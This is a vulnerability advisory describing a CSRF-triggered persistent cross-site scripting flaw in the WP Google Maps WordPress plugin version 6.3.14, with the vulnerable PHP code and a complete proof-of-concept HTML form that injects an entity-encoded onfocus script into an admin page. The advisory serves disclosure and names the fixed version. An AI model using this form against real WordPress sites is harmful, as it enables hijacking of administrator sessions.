Persistent Cross-Site Scripting in WP Google Maps Plugin via CSRF

Abstract

A persistent Cross-Site Scripting vulnerability was found in the WP Google Maps Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.

OVE ID

OVE-20160724-0007

Tested versions

This issue was successfully tested on the WP Google Maps WordPress Plugin version 6.3.14.

Fix

This issue is resolved in WP Google Maps WordPress Plugin version 6.3.15.

Introduction

The WP Google Maps plugin is a plugin to create a custom Google map with high quality markers containing categories, descriptions, images and links. A persistent Cross-Site Scripting vulnerability was found in the WP Google Maps Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.

Details

The issue exists in the file wpGoogleMaps.php and is caused by the lack of output encoding on the wpgmza_store_locator_query_string request parameter. The parameter is sanitized with sanitize_text_field, which will encode characters for usage in HTML context. However, the parameter is used in JavaScript context, allowing for Cross-Site Scripting. The vulnerable code is listed below.

$other_settings['store_locator_query_string'] = sanitize_text_field($_POST['wpgmza_store_locator_query_string']);
if (isset($_POST['wpgmza_store_locator_restrict'])) { $other_settings['wpgmza_store_locator_restrict'] = sanitize_text_field($_POST['wpgmza_store_locator_restrict']); }
[..]
if (isset($map_other_settings['wpgmza_store_locator_restrict'])) { $restrict_search = $map_other_settings['wpgmza_store_locator_restrict']; } else { $restrict_search = false; }
[..]
{ types: ['geocode'], componentRestrictions: {country: '<?php echo $restrict_search; ?>'} });

Proof of Concept

Have an authenticated admin visit a webpage with the following form:

<html>
	<body>
		<form action="http://<wordpress site>/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1" method="POST">
			<input type="hidden" name="wpgmza&#95;id" value="1" />
			<input type="hidden" name="wpgmza&#95;start&#95;location" value="45&#46;950464398418106&#44;&#45;109&#46;81550500000003" />
			<input type="hidden" name="wpgmza&#95;start&#95;zoom" value="2" />
			<input type="hidden" name="wpgmza&#95;title" value="My&#32;first&#32;map" />
			<input type="hidden" name="wpgmza&#95;width" value="100" />
			<input type="hidden" name="wpgmza&#95;map&#95;width&#95;type" value="&#37;" />
			<input type="hidden" name="wpgmza&#95;height" value="400" />
			<input type="hidden" name="wpgmza&#95;map&#95;height&#95;type" value="px" />
			<input type="hidden" name="wpgmza&#95;map&#95;align" value="1" />
			<input type="hidden" name="wpgmza&#95;map&#95;type" value="1" />
			<input type="hidden" name="wpgmza&#95;theme&#95;data&#95;0" value="" />
			<input type="hidden" name="wpgmza&#95;store&#95;locator&#95;restrict" value="ad" />
			<input type="hidden" name="wpgmza&#95;store&#95;locator&#95;query&#95;string" value="&#58;i8gr4&quot;onfocus&#61;&quot;alert&#40;1&#41;&quot;autofocus&#61;&quot;" />
			<input type="hidden" name="wpgmza&#95;store&#95;locator&#95;bounce" value="on" />
			<input type="hidden" name="wpgmza&#95;max&#95;zoom" value="1" />
			<input type="hidden" name="wpgmza&#95;savemap" value="Save&#32;Map&#32;&#187;" />
			<input type="hidden" name="wpgmza&#95;edit&#95;id" value="" />
			<input type="hidden" name="wpgmza&#95;animation" value="0" />
			<input type="hidden" name="wpgmza&#95;infoopen" value="0" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

When the form is submitted (or auto-submitted), a popup box will appear, which means that the JavaScript from the parameter wpgmza_store_locator_query_string is executed in the admin's browser. The JavaScript will run every time the map (with id 1 in this case) is viewed/edited by an admin.

Vragen of feedback?